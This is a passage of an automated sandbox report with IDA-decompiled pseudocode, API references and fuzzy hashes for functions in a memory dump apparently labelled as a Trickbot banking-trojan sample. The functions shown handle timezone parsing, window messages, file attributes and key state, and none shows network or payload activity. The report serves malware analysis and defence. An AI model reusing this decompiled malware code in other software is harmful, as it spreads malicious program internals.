                          								_t27[3] = _t27[3] & 0x00000000;
                          								if( *_t76 == 0x2d) {
                          									_v12 = 1;
                          									_t76 = _t76 + 1;
                          								}
                          								_t60 = E0040615C(_t56, _t76) * 0xe10;
                          								 *0x448670 = _t60;
                          								while(1) {
                          									_t29 =  *_t76;
                          									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
                          										break;
                          									}
                          									_t76 = _t76 + 1;
                          								}
                          								if( *_t76 == 0x3a) {
                          									_t76 = _t76 + 1;
                          									_t32 = E0040615C(_t60, _t76);
                          									_t63 =  *0x448670; // 0x7080
                          									_t60 = _t63 + _t32 * 0x3c;
                          									 *0x448670 = _t60;
                          									while(1) {
                          										_t34 =  *_t76;
                          										if(_t34 < 0x30 || _t34 > 0x39) {
                          											break;
                          										}
                          										_t76 = _t76 + 1;
                          									}
                          									if( *_t76 == 0x3a) {
                          										_t76 = _t76 + 1;
                          										_t35 = E0040615C(_t60, _t76);
                          										_t65 =  *0x448670; // 0x7080
                          										_t60 = _t65 + _t35;
                          										 *0x448670 = _t60;
                          										while(1) {
                          											_t36 =  *_t76;
                          											if(_t36 < 0x30 || _t36 > 0x39) {
                          												goto L36;
                          											}
                          											_t76 = _t76 + 1;
                          										}
                          									}
                          								}
                          								L36:
                          								if(_v12 != 0) {
                          									 *0x448670 =  ~_t60;
                          								}
                          								_t30 =  *_t76;
                          								 *0x448674 = _t30;
                          								if(_t30 == 0) {
                          									goto L40;
                          								} else {
                          									E0040B920( *0x448700, _t76, 3);
                          									_t18 =  *0x448700; // 0x4486bc
                          									_t18[3] = _t18[3] & 0x00000000;
                          								}
                          							}
                          						} else {
                          							_t37 = E004080C0(_t74, _t19);
                          							_pop(_t56);
                          							if(_t37 == 0) {
                          								goto L41;
                          							} else {
                          								goto L18;
                          							}
                          						}
                          					}
                          				} else {
                          					E004080A3(_t70);
                          					 *_t80 = 0x44b980;
                          					_t18 = GetTimeZoneInformation(??);
                          					if(_t18 != 0xffffffff) {
                          						_t39 =  *0x44b980; // 0x0
                          						_t67 =  *0x44b9d4; // 0x0
                          						_t40 = _t39 * 0x3c;
                          						_t87 =  *0x44b9c6; // 0x0
                          						_t68 = 1;
                          						 *0x448670 = _t40;
                          						 *0x44b978 = _t68;
                          						if(_t87 != 0) {
                          							 *0x448670 = _t40 + _t67 * 0x3c;
                          						}
                          						_t89 =  *0x44ba1a; // 0x0
                          						if(_t89 == 0) {
                          							L7:
                          							 *0x448674 = 0;
                          							 *0x448678 = 0;
                          						} else {
                          							_t47 =  *0x44ba28; // 0x0
                          							if(_t47 == 0) {
                          								goto L7;
                          							} else {
                          								 *0x448674 = _t68;
                          								 *0x448678 = (_t47 - _t67) * 0x3c;
                          							}
                          						}
                          						if(WideCharToMultiByte( *0x44b970, 0x220, 0x44b984, 0xffffffff,  *0x4486fc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                          							_t43 =  *0x4486fc; // 0x44867c
                          							 *_t43 =  *_t43 & 0x00000000;
                          						} else {
                          							_t46 =  *0x4486fc; // 0x44867c
                          							_t46[0x3f] = _t46[0x3f] & 0x00000000;
                          						}
                          						if(WideCharToMultiByte( *0x44b970, 0x220, 0x44b9d8, 0xffffffff,  *0x448700, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                          							L40:
                          							_t18 =  *0x448700; // 0x4486bc
                          							 *_t18 =  *_t18 & 0x00000000;
                          						} else {
                          							_t18 =  *0x448700; // 0x4486bc
                          							_t18[0x3f] = _t18[0x3f] & 0x00000000;
                          						}
                          					}
                          				}
                          				return _t18;
                          			}

                          APIs
                            • Part of subcall function 00408042: InitializeCriticalSection.KERNEL32(00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040807F
                            • Part of subcall function 00408042: EnterCriticalSection.KERNEL32(j/@,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040809A
                            • Part of subcall function 004080A3: LeaveCriticalSection.KERNEL32(?,004053EE,00000009,j/@,0040808E,00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A), ref: 004080B0
                          • GetTimeZoneInformation.KERNEL32(0000000C,?,0000000C,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040A9AC
                          • WideCharToMultiByte.KERNEL32(00000220,0044B984,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040AA42
                          • WideCharToMultiByte.KERNEL32(00000220,0044B9D8,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040AA7B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                          • String ID:
                          • API String ID: 3442286286-0
                          • Opcode ID: e89c520ade0f5e0ba6e23b6c0f3ffec96f96e04f253b3ec7f330ca57c3e9ad1c
                          • Instruction ID: a8ebf62ffa1bd6dc64c0a4e0a79652d9f8147e1207c617059a8d104f752e9cfd
                          • Opcode Fuzzy Hash: e89c520ade0f5e0ba6e23b6c0f3ffec96f96e04f253b3ec7f330ca57c3e9ad1c
                          • Instruction Fuzzy Hash: D96109B55043009ED721AF69EC51B2A7BB5E703314F15013FE680A72E1DB789952CB9F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E004042FB(struct HWND__* _a4, signed int _a8) {
                          				struct _WINDOWPLACEMENT _v48;
                          				int _t16;
                          
                          				if(E004041CD() == 0) {
                          					if((_a8 & 0x00000003) == 0) {
                          						if(IsIconic(_a4) == 0) {
                          							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                          						} else {
                          							_t16 = GetWindowPlacement(_a4,  &_v48);
                          						}
                          						if(_t16 == 0) {
                          							return 0;
                          						} else {
                          							return E004042A5( &(_v48.rcNormalPosition), _a8);
                          						}
                          					}
                          					return 0x12340042;
                          				}
                          				return  *0x44b0c4(_a4, _a8);
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5847c3dd0c427fee8e4d041abcd5c472a9e9d10916e112c6d6433b3af88f36d5
                          • Instruction ID: 558bcf38d93e6d9a7b66166c53d49e0ff65d3de966abc2fc7fcfa35054c1b8c5
                          • Opcode Fuzzy Hash: 5847c3dd0c427fee8e4d041abcd5c472a9e9d10916e112c6d6433b3af88f36d5
                          • Instruction Fuzzy Hash: B1F01D71604109BBDF46AF71DC08AAF7B78BF80344B44A036FE16A51A0DB38DA519B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00420A57(void* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _t7;
                          				void* _t14;
                          				void* _t16;
                          				struct HWND__** _t20;
                          
                          				_t21 = __ebp;
                          				_t7 = _a4;
                          				_t20 = _t7 + 0x1c;
                          				_t16 = E0041884D(__ebp, GetParent( *(_t7 + 0x1c)));
                          				if(E0041C5C7(_t16, 0x43b880) == 0) {
                          					L4:
                          					return 0;
                          				}
                          				if(_a8 != 0) {
                          					L5:
                          					return _t16;
                          				} else {
                          					goto L2;
                          				}
                          				while(1) {
                          					L2:
                          					_t14 = E0041884D(_t21, GetParent( *_t20));
                          					if(_t14 == 0) {
                          						goto L5;
                          					}
                          					_t6 = _t14 + 0x1c; // 0x1c
                          					_t20 = _t6;
                          					if(IsIconic( *(_t14 + 0x1c)) == 0) {
                          						continue;
                          					}
                          					goto L4;
                          				}
                          				goto L5;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Parent$Iconic
                          • String ID:
                          • API String ID: 344791563-0
                          • Opcode ID: 24cf1411d6b4081e499c94d7acc87b497c25d3b1698e20be47ddb37db00d55b1
                          • Instruction ID: b442bd98a8012428f59134a6fea3bf8f9b4399ab8d5330b34e0cac049ac68c34
                          • Opcode Fuzzy Hash: 24cf1411d6b4081e499c94d7acc87b497c25d3b1698e20be47ddb37db00d55b1
                          • Instruction Fuzzy Hash: 33F09032300311AFDB146E62EC44E5B37ACEF90354B81443AB581932A2CA28DC06CA68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E004196D8(intOrPtr* __ecx) {
                          				signed int _t137;
                          				signed int _t140;
                          				signed int _t141;
                          				signed int _t145;
                          				signed int _t147;
                          				signed int _t148;
                          				intOrPtr _t150;
                          				signed int _t151;
                          				signed int* _t152;
                          				signed char _t155;
                          				unsigned int _t159;
                          				unsigned int _t167;
                          				void* _t168;
                          				signed int _t172;
                          				signed int* _t176;
                          				unsigned int _t178;
                          				intOrPtr* _t179;
                          				unsigned int _t180;
                          				intOrPtr* _t181;
                          				signed int _t186;
                          				unsigned int _t191;
                          				unsigned int _t203;
                          				void* _t205;
                          
                          				_t182 = __ecx;
                          				E00405340(E00437830, _t205);
                          				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
                          				_t172 =  *(_t205 + 8);
                          				_t200 = __ecx;
                          				if(_t172 != 0x111) {
                          					if(_t172 != 0x4e) {
                          						_t203 =  *(_t205 + 0x10);
                          						if(_t172 == 6) {
                          							E004185B5(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E0041884D(_t205, _t203));
                          						}
                          						if(_t172 != 0x20 || E00418616(_t200, _t203, _t203 >> 0x10) == 0) {
                          							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
                          							 *(_t205 - 0x14) = _t137;
                          							E004330FA(7);
                          							_t186 =  *(_t205 + 8);
                          							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
                          							_t176 = 0x449798 + _t140 * 4;
                          							_t141 =  *(_t205 - 0x14);
                          							if(_t186 !=  *(0x449798 + _t140 * 4) || _t141 != _t176[2]) {
                          								 *_t176 = _t186;
                          								_t176[2] = _t141;
                          								if(_t141 == 0) {
                          									L29:
                          									_t176[1] = _t176[1] & 0x00000000;
                          									E0043316A(7);
                          									goto L30;
                          								}
                          								L20:
                          								while(1) {
                          									if(_t186 >= 0xc000) {
                          										_t145 = E00419654( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
                          										 *(_t205 + 0x10) = _t145;
                          										if(_t145 == 0) {
                          											L28:
                          											_t147 =  *( *(_t205 - 0x14));
                          											 *(_t205 - 0x14) = _t147;
                          											if(_t147 != 0) {
                          												_t141 =  *(_t205 - 0x14);
                          												_t186 =  *(_t205 + 8);
                          												continue;
                          											}
                          											goto L29;
                          										}
                          										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
                          											_t159 = E00419654(_t145 + 0x18, 0xc000, 0, 0);
                          											 *(_t205 + 0x10) = _t159;
                          											if(_t159 != 0) {
                          												_t145 =  *(_t205 + 0x10);
                          												continue;
                          											}
                          											goto L28;
                          										}
                          										_t176[1] = _t145;
                          										E0043316A(7);
                          										_t180 =  *(_t205 + 0x10);
                          										goto L96;
                          									}
                          									_t148 = E00419654( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
                          									 *(_t205 + 0x10) = _t148;
                          									if(_t148 != 0) {
                          										_t176[1] = _t148;
                          										E0043316A(7);
                          										_t178 =  *(_t205 + 0x10);
                          										goto L33;
                          									}
                          									goto L28;
                          								}
                          							} else {
                          								_t178 = _t176[1];
                          								 *(_t205 + 0x10) = _t178;
                          								E0043316A(7);
                          								if(_t178 == 0) {
                          									L30:
                          									goto L31;
                          								}
                          								if( *(_t205 + 8) < 0xc000) {
                          									L33:
                          									_t191 =  *(_t205 + 0x10);
                          									_t179 =  *((intOrPtr*)(_t178 + 0x14));
                          									_t150 =  *((intOrPtr*)(_t191 + 0x10));
                          									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
                          										_t155 = GetVersion();
                          										asm("sbb eax, eax");
                          										_t150 = (_t155 & 0x000000f0) + 0x2f;
                          									}
                          									_t151 = _t150 - 1;
                          									if(_t151 > 0x30) {
                          										goto L100;
                          									} else {
                          										switch( *((intOrPtr*)(_t151 * 4 +  &M00419B86))) {
                          											case 0:
                          												_push( *((intOrPtr*)(_t205 + 0xc)));
                          												_push(E00420D46());
                          												goto L52;
                          											case 1:
                          												_push( *(__ebp + 0xc));
                          												goto L52;
                          											case 2:
                          												_push(__esi >> 0x10);
                          												__eax = __si;
                          												_push(__si);
                          												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
                          												goto L55;
                          											case 3:
                          												__ecx = __ebp - 0x24;
                          												E00420CA4(__ebp - 0x24) =  *(__esi + 4);
                          												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                          												__ecx = __ebp - 0x60;
                          												 *(__ebp - 0x20) =  *(__esi + 4);
                          												__eax = E0041842C(__ebp - 0x60);
                          												__eax =  *__esi;
                          												__esi =  *(__esi + 8);
                          												_push(__eax);
                          												 *(__ebp - 4) = 1;
                          												 *(__ebp - 0x44) = __eax;
                          												__eax = E00418874();
                          												if(__eax == 0) {
                          													__eax =  *(__edi + 0x34);
                          													if(__eax != 0) {
                          														__ecx = __eax + 0x20;
                          														__eax = E00416F2F(__eax + 0x20,  *(__ebp - 0x44));
                          														if(__eax != 0) {
                          															 *(__ebp - 0x28) = __eax;
                          														}
                          													}
                          													__eax = __ebp - 0x60;
                          												}
                          												_push(__esi);
                          												_push(__eax);
                          												__eax = __ebp - 0x24;
                          												__ecx = __edi;
                          												_push(__ebp - 0x24);
                          												__eax =  *__ebx();
                          												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                          												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
                          												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                          												__ecx = __ebp - 0x60;
                          												 *(__ebp - 0x10) = __ebp - 0x24;
                          												__eax = E00418EC0(__ebp - 0x60);
                          												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                          												__ecx = __ebp - 0x24;
                          												goto L48;
                          											case 4:
                          												__ecx = __ebp - 0x24;
                          												E00420CA4(__ebp - 0x24) =  *(__esi + 4);
                          												_push( *(__esi + 8));
                          												 *(__ebp - 0x20) =  *(__esi + 4);
                          												__eax = __ebp - 0x24;
                          												_push(__ebp - 0x24);
                          												__ecx = __edi;
                          												 *(__ebp - 4) = 2;
                          												__eax =  *__ebx();
                          												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                          												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                          												 *(__ebp - 0x10) = __ebp - 0x24;
                          												__ecx = __ebp - 0x24;
                          												L48:
                          												__eax = E00420DC3(__ecx);
                          												goto L100;
                          											case 5:
                          												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                          												_push( *(__ebp + 0xc) >> 0x10);
                          												__eax = E0041884D(__ebp, __esi);
                          												goto L54;
                          											case 6:
                          												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                          												_push( *(__ebp + 0xc) >> 0x10);
                          												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                          												goto L83;
                          											case 7:
                          												_push(__esi);
                          												L52:
                          												_t154 =  *_t179();
                          												goto L99;
                          											case 8:
                          												L97:
                          												_push(_t203);
                          												_push( *((intOrPtr*)(_t205 + 0xc)));
                          												goto L98;
                          											case 9:
                          												_push(__esi);
                          												_push(E0041CF83());
                          												__eax =  *(__ebp + 0xc);
                          												__eax =  *(__ebp + 0xc) >> 0x10;
                          												L54:
                          												_push(__eax);
                          												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                          												L55:
                          												_push(__eax);
                          												__ecx = __edi;
                          												__eax =  *__ebx();
                          												goto L99;
                          											case 0xa:
                          												__ecx = __edi;
                          												__eax =  *__ebx();
                          												goto L100;
                          											case 0xb:
                          												_push( *(__ebp + 0xc));
                          												goto L86;
                          											case 0xc:
                          												_push(__esi);
                          												goto L80;
                          											case 0xd:
                          												__esi = __esi >> 0x10;
                          												__eax = __ax;
                          												_push(__ax);
                          												__eax = __si;
                          												goto L59;
                          											case 0xe:
                          												_push(__esi >> 0x10);
                          												__eax = __si & 0x0000ffff;
                          												goto L90;
                          											case 0xf:
                          												_push(E0041884D(__ebp,  *(__ebp + 0xc)));
                          												_push(E0041884D(__ebp, __esi));
                          												__eax = 0;
                          												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
                          												goto L62;
                          											case 0x10:
                          												_push( *(__ebp + 0xc));
                          												__eax = E00420D46();
                          												goto L64;
                          											case 0x11:
                          												_push( *(__ebp + 0xc));
                          												__eax = E0041CF83();
                          												goto L64;
                          											case 0x12:
                          												_push(__esi >> 0x10);
                          												__eax = __si & 0x0000ffff;
                          												_push(__si & 0x0000ffff);
                          												_push( *(__ebp + 0xc));
                          												__eax = E0041CF83();
                          												goto L62;
                          											case 0x13:
                          												_push( *(__ebp + 0xc));
                          												goto L69;
                          											case 0x14:
                          												_push(__esi >> 0x10);
                          												__eax = __si & 0x0000ffff;
                          												goto L72;
                          											case 0x15:
                          												__eax = __si;
                          												__esi = __esi >> 0x10;
                          												__ecx = __si;
                          												_push(__si);
                          												L72:
                          												_push(__eax);
                          												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
                          												goto L62;
                          											case 0x16:
                          												_push(__esi);
                          												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
                          												L59:
                          												_push(__eax);
                          												goto L81;
                          											case 0x17:
                          												_push(E0041884D(__ebp, __esi));
                          												L80:
                          												_push( *(__ebp + 0xc));
                          												goto L81;
                          											case 0x18:
                          												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                          												_push( *(__ebp + 0xc) >> 0x10);
                          												__eax = E0041884D(__ebp, __esi);
                          												goto L88;
                          											case 0x19:
                          												__eax =  *(__ebp + 0xc);
                          												__edx = __ax;
                          												__eax =  *(__ebp + 0xc) >> 0x10;
                          												 *((intOrPtr*)(__ebp + 8)) = __edx;
                          												__eax = __ax;
                          												 *(__ebp + 0xc) = __eax;
                          												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
                          													_push(__eax);
                          													_push(__edx);
                          													L81:
                          													__ecx = __edi;
                          													__eax =  *__ebx();
                          													goto L100;
                          												}
                          												_push(E0041884D(__ebp, __esi));
                          												_push( *(__ebp + 0xc));
                          												_push( *((intOrPtr*)(__ebp + 8)));
                          												goto L91;
                          											case 0x1a:
                          												_push(__esi);
                          												goto L86;
                          											case 0x1b:
                          												_push(__esi);
                          												__ecx = __edi;
                          												_push( *(__ebp + 0xc));
                          												__eax =  *__ebx();
                          												goto L93;
                          											case 0x1c:
                          												__eax = __si;
                          												__esi = __esi >> 0x10;
                          												__ecx = __si;
                          												_push(__si);
                          												goto L83;
                          											case 0x1d:
                          												__ecx = __edi;
                          												__eax =  *__ebx();
                          												goto L99;
                          											case 0x1e:
                          												goto L100;
                          											case 0x1f:
                          												_push(__esi);
                          												L69:
                          												__eax = E0041884D(__ebp);
                          												L64:
                          												_push(__eax);
                          												L86:
                          												__ecx = __edi;
                          												__eax =  *__ebx();
                          												goto L100;
                          											case 0x20:
                          												_push(__esi);
                          												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
                          												L83:
                          												_push(__eax);
                          												L98:
                          												_t154 =  *_t181();
                          												L99:
                          												 *(_t205 - 0x10) = _t154;
                          												goto L100;
                          											case 0x21:
                          												__eax = __si & 0x0000ffff;
                          												_push(__esi);
                          												_push(__si & 0x0000ffff);
                          												__eax =  *(__ebp + 0xc);
                          												__ecx = __edi;
                          												__eax =  *(__ebp + 0xc) >> 0x10;
                          												_push( *(__ebp + 0xc) >> 0x10);
                          												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                          												_push( *(__ebp + 0xc) & 0x0000ffff);
                          												__eax =  *__ebx();
                          												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                          												L6:
                          												if(_t168 != 0) {
                          													goto L100;
                          												}
                          												goto L30;
                          											case 0x22:
                          												__eax =  *(__ebp + 0xc);
                          												_push(__esi);
                          												__eax =  *(__ebp + 0xc) >> 0x10;
                          												L88:
                          												_push(__eax);
                          												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                          												L62:
                          												_push(__eax);
                          												goto L91;
                          											case 0x23:
                          												__eax = __si;
                          												__esi = __esi >> 0x10;
                          												__ecx = __si;
                          												_push(__si);
                          												L90:
                          												_push(__eax);
                          												_push( *(__ebp + 0xc));
                          												L91:
                          												__ecx = __edi;
                          												__eax =  *__ebx();
                          												goto L100;
                          										}
                          									}
                          								}
                          								L96:
                          								_t181 =  *((intOrPtr*)(_t180 + 0x14));
                          								goto L97;
                          							}
                          						} else {
                          							L93:
                          							 *(_t205 - 0x10) = 1;
                          							L100:
                          							_t152 =  *(_t205 + 0x14);
                          							if(_t152 != 0) {
                          								 *_t152 =  *(_t205 - 0x10);
                          							}
                          							_push(1);
                          							_pop(0);
                          							L31:
                          							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
                          							return 0;
                          						}
                          					}
                          					_t167 =  *(_t205 + 0x10);
                          					if( *_t167 == 0) {
                          						goto L30;
                          					}
                          					_push(_t205 - 0x10);
                          					_push(_t167);
                          					_push( *((intOrPtr*)(_t205 + 0xc)));
                          					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
                          					goto L6;
                          				}
                          				_push( *(_t205 + 0x10));
                          				_push( *((intOrPtr*)(_t205 + 0xc)));
                          				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
                          					goto L30;
                          				}
                          				goto L93;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004196DD
                          • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00419890
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologVersion
                          • String ID:
                          • API String ID: 1836448879-0
                          • Opcode ID: 97259873a2008b5b65ad31e05acc28ca61a34101e003d42508f6c5f9eb32b744
                          • Instruction ID: f44f9266093c5cd8a2ab8314d556b248f281fc2a73fb1656333fc09446bddc6e
                          • Opcode Fuzzy Hash: 97259873a2008b5b65ad31e05acc28ca61a34101e003d42508f6c5f9eb32b744
                          • Instruction Fuzzy Hash: 68E18F70614205EBDF14DF65CCA0AFE77A9FF04314F10851AF8169A291DB38EE82DB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0041E050(CHAR* _a4, intOrPtr* _a8) {
                          				struct _WIN32_FIND_DATAA _v324;
                          				void* __ebp;
                          				signed char _t21;
                          				void* _t23;
                          				intOrPtr _t36;
                          				void* _t37;
                          				signed int _t43;
                          				intOrPtr* _t45;
                          
                          				_t45 = _a8;
                          				_push(_a4);
                          				_t43 = _t45 + 0x12;
                          				_push(_t43);
                          				_t21 = E0041D790();
                          				if(_t21 != 0) {
                          					_t23 = FindFirstFileA(_a4,  &_v324);
                          					_t44 = _t43 | 0xffffffff;
                          					if(_t23 != (_t43 | 0xffffffff)) {
                          						FindClose(_t23);
                          						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
                          						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
                          						 *_t45 =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftCreationTime), _t44)));
                          						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftLastAccessTime), _t44)));
                          						_t36 =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftLastWriteTime), _t44)));
                          						 *((intOrPtr*)(_t45 + 4)) = _t36;
                          						if( *_t45 == 0) {
                          							 *_t45 = _t36;
                          						}
                          						if( *((intOrPtr*)(_t45 + 8)) == 0) {
                          							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
                          						}
                          						_t37 = 1;
                          						return _t37;
                          					}
                          					L3:
                          					return 0;
                          				}
                          				 *_t43 =  *_t43 & _t21;
                          				goto L3;
                          			}

                          APIs
                            • Part of subcall function 0041D790: __EH_prolog.LIBCMT ref: 0041D795
                            • Part of subcall function 0041D790: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0041D7B3
                            • Part of subcall function 0041D790: lstrcpynA.KERNEL32(?,?,00000104), ref: 0041D7C2
                          • FindFirstFileA.KERNEL32(?,?,?,?), ref: 0041E07C
                          • FindClose.KERNEL32(00000000), ref: 0041E08E
                            • Part of subcall function 00416006: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00416016
                            • Part of subcall function 00416006: FileTimeToSystemTime.KERNEL32(?,?), ref: 00416028
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
                          • String ID:
                          • API String ID: 1806329094-0
                          • Opcode ID: e112b580549393529589ac8462ba1568369bc468c0aef79684a4e5432c9baad8
                          • Instruction ID: 11aa785b8609821e5c3913dd45f7471bb1c9177f990fd37d235ac8e5a6537ffa
                          • Opcode Fuzzy Hash: e112b580549393529589ac8462ba1568369bc468c0aef79684a4e5432c9baad8
                          • Instruction Fuzzy Hash: 19216276400214AFCB21DF66C840ADBBBF8AF59310F10896AE996C7250E774EA85CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042BF21(void* __ecx, void* __eflags, long _a4) {
                          				void* _t6;
                          				intOrPtr _t9;
                          				void* _t13;
                          				long _t14;
                          
                          				_t14 = _a4;
                          				_t13 = __ecx;
                          				if(E00419115(__ecx, _t14) != 0) {
                          					L7:
                          					_t6 = 1;
                          					return _t6;
                          				}
                          				if( *((intOrPtr*)(_t14 + 4)) != 0x100 || GetAsyncKeyState(0x11) >= 0) {
                          					L8:
                          					return E0041AFF4(_t14);
                          				} else {
                          					_t9 =  *((intOrPtr*)(_t14 + 8));
                          					if(_t9 == 9 || _t9 == 0x21 || _t9 == 0x22) {
                          						if(SendMessageA( *(_t13 + 0x1c), 0x475, 0, _t14) == 0) {
                          							goto L8;
                          						}
                          						goto L7;
                          					} else {
                          						goto L8;
                          					}
                          				}
                          			}

                          APIs
                          • GetAsyncKeyState.USER32(00000011), ref: 0042BF3E
                          • SendMessageA.USER32(?,00000475,00000000,?), ref: 0042BF66
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
